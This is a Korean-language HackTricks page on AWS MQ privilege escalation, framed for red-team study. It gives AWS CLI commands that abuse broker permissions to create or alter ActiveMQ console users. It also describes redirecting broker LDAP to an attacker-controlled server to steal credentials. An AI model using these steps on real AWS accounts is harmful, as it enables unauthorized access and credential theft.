AWS - MQ Privesc

htARTE (HackTricks AWS Red Team Expert)을 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

MQ

MQ에 대한 자세한 정보는 다음을 참조하세요:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

이러한 권한을 가지고 있다면 ActimeMQ 브로커에 새 사용자를 생성할 수 있습니다(RabbitMQ에서는 작동하지 않음):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

잠재적 영향: ActiveMQ를 통해 민감한 정보에 접근

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

이러한 권한을 가지고 있다면 ActimeMQ 브로커에 새로운 사용자를 생성할 수 있습니다 (RabbitMQ에서는 작동하지 않음):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

잠재적 영향: ActiveMQ를 통해 민감한 정보에 접근

mq:ListBrokers, mq:UpdateBroker

브로커가 ActiveMQ를 사용하여 LDAP를 사용하는 경우, 공격자가 제어하는 LDAP 서버의 구성을 변경할 수 있습니다. 이렇게 하면 공격자는 LDAP를 통해 전송되는 모든 자격 증명을 도난할 수 있습니다.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

만약 ActiveMQ에서 사용된 원래 자격 증명을 찾을 수 있다면 MitM을 수행하여 자격 증명을 도용하고 원래 서버에서 사용하고 응답을 보낼 수 있습니다 (도난된 자격 증명을 재사용하여 이 작업을 수행할 수도 있습니다).

잠재적인 영향: ActiveMQ 자격 증명 도난

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新